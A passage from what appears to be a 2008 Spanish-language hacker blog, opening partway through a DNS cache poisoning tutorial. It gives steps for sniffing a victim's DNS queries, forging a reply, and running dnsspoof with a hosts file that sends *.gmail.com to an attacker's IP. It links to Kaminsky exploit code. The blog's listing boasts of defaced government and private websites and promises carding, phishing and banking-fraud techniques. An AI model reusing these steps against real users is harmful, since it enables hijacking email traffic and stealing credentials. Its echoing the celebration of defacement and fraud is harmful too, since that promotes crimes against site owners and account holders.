Con eso se snifará todo el trafico que pase por nuestra maquina con destino a [Router] en protocolo udp. Lo que resta es hacer un script en bash que analice cada 1 segundo el contenido de "/dump", chequee si hay una peticion a [DNS de GMAIL], que en caso negativo borre el dump, en caso afirmativo detenga el ip_forwarding.

Tecer paso:
Ahora Zer0 que ya tiene el id de la petición falsea una respuesta de forma similar a la siguiente:

Citar

[DNS de GMAIL]. 124594 IN A 192.x.x.x

Donde 124594 es la ID y 192.x.x.x es la IP falseada.

Con esto quedaría en teoría envenenada la caché del [DNS de Pepe]!

Alternativa al Tercer paso:
Imaginando que Zer0 tuviera acceso la red local de Pepe en lugar de al DNS de Pepe sería mucho más sencillo usar la herramienta DNSSpoof:
(Los pasos anteriores serían identicos salvando la diferencia entre [DNS de Pepe] y [Pepe])

Citar

[root@PC OWNED Zer0]# dnsspoof -f hosts
dnsspoof: listening on eth0 [udp dst port 53 and not src [PC OWNED]]

Y luego creado el hosts de la siguiente forma:

Citar

----
[root@PC OWNED Zer0]# cat > hosts
192.x.x.x *.gmail.com
----

Con eso en cuanto [Pepe] le haga una petición al DNS relativa a gmail estará spoofeado el dns server y no habrá necesidad de envenenar la caché del verdadero DNS :P

~~~~~~~~~~~~~~~~~~~~~~~~~~
Despedida:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Queda mucho más por decir, se puede hablar de metodos para intentar "adivinar" la ID de los mensajes y así evitar tener que spoofear, se puede hablar de exploits que lo hacen todo solo, de servidores mas o menos vulnerables, etc etc.
Yo creo que la teoría hasta acá llega y los que hayan leido y comprendido ya pueden considerar que saben bien que es y mas o menos como realizar un ataque a un DNS Server.

Para finalizar les pongo documentación y enlaces interesantes que DEBEN si o si chequear:

- Kaminsky DNS Cache Poisoning Flaw Exploit for host
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
- Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
- DNS Spoofing techniques
http://www.securesphere.net/download/papers/dnsspoof.htm
- Información técnica:
http://www.kb.cert.org/vuls/id/800113
http://www.us-cert.gov/cas/techalerts/TA08-190B.html
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
-Lista con el estado de servidores DNS de los principales ISP españoles:
http://bandaancha.eu/analizador-dns

Gothic-X

2008-10-13T16:23:00.000-07:00

Este sera mi pequeño espacio de musica y algo de seguridad e inseguridad de internet
asi como les mostrare pequeñas tecnicas del carding & banking.
pueden visitar www.MexicanCrew.com || wwwDiosDeLaRed.com|| www.MundoNet.Us

Greetz: Tr4d3, Anarkill, Xoptik, Wijotoma, MurdeR, Knet, Wazz, Attacker, Ghost, NoFeck, Nexus, Sombrita_X, Masterteam, RedPoint, LastDragon, RedPeter, Oscar Rovira, MXCREW al user, DDLR all user, #RE al user

UnderMx ..:: GothicX::..

Criptografia geometrica (1/4) Un Nuevo Concepto de Criptografia

Explotar xampp+ phpmyadmin..mas que una webshell.

X.25 EHC

Hackean portal del Diario Oficial de la Federación

¿Se te olvido el password de tu ubuntu?

Ciber Protesta Mexicana :: 16 de Sep 2010

Nod32 keys

Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web

script www.sexshop.pl

Facebook smileys

Hacking Wireless Modems thompson - Speedtouch

CDmon y Google app email.

Steve Jobs contra la tecnología Flash

Maneras de llegar a un objetivo.

Facebook Phishing..

"X.25 Ethical Hacking Conferences"

SISCTI 35

¿Quiénes Somos?

Conferencias

pasos para aprender a bailar duranguense

Reclaman a gobierno a través de protesta en la red

Mini-manual de *.htaccess

Fin de semana en Merida

Servidor en Linux Ubuntu Server – ( Manual completo )

The BlackList By Zer0 Z0org

Crackear claves wep

EPICA - Unleashed

Problemas con password en hojas de excel?

Explotando Full Source Diclosure Bugueando "force-download.php"

La Seguridad en Algunos servidores.

Bug en web desarrolladora SUSTAM.COM

Tutorial Ijection SQL

http://www.santaclara.gob.mx/ Owned

dicadeteatro.com.br Owned

MiniMetraje Minimalista

Ayer pedi que te murieras - Victor Garcia

Instituto Academico de Investigaciones y Capacitacion Electoral

ComboFix

Las 10 chicas mas guapas y geeks

El árbol de navidad más friki/geek

GAP [GrupoAnti-Pedofilia]

Dejando el "Fabricado y con soporte de" en win xp

Cambiando el boton de inicio a Ubuntu

defaces by me

Owned http://www.zbjsj.gov.cn/

[H]acked By No[F]eck [S]ecurity OFFCyber Inteligencia Criminal

[G]reetz:[G]othic-x - [A]gent - [N]exus

http://r3d-point.com/ Defaced By 0o_zeus_o0

ALKON OWNED

HACKED BY Knet, Ricota & Pollo!

Kcho Borracho NOT DEAD

El mejor server de Argentina

Vamos las Putas !!!

Owned Canal 11

Cambiar el nombre al boton inicio "xp Profecional"

Minimanual "Crackeando una red Wifi"

Se pintan casas a domicilio??

Nokia 1100 Vs Iphone

Detenido phisher rumano por estafar 700.000 dólares

Acunetix.Web.Vulnerability.Scanner.v5.1

Tienes seguridad en internet??

Genitallica Discografia.

Pohtoshop portable

XeroBank Browser (Navegador Anonimo)

Owned http://www.consejodeseguridad.gob.mx/index.html

[H]acked By No[F]eck [S]ecurity OFFCyber Inteligencia Criminal

[G]reetz:[G]othic-x - [A]gent - [N]exus

Owned http://www.stadtfriseur.at/

[H]acked By No[F]eck [S]ecurity OFFCyber Inteligencia Criminal

[G]reetz:[G]othic-x - [A]gent - [N]exus

DNS Poison "El verdadero arte" by MurdeR

Gothic-X

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal